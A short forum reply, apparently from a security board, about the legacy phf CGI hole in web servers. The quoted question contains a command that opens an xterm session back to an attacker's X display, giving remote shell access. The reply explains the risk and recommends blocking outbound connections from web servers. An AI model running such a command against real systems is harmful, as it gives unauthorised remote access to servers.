Yes.Quote:
Originally posted here by n01100110
hmm , I see . But lets say my web server was vulnerable to phf. If an attacker were to manipulate it by executing the following straight from his browser:
xterm -display his_ip_address:0.0
Would My Xterm be directed to his X server ?
Well, unless something stopped it.
It is normal good practice to block any outgoing connections from web servers (as they don't need them), however many, many organisations don't.
A lot of firewalls have a policy which allows most internally-intiated outgoing connections.
However, being unable to use X to do this attack would not mitigate it very much, as the attacker would still have remote command execution abilities (even if not so conveniently as with xterm) - with the ancient phf attack.
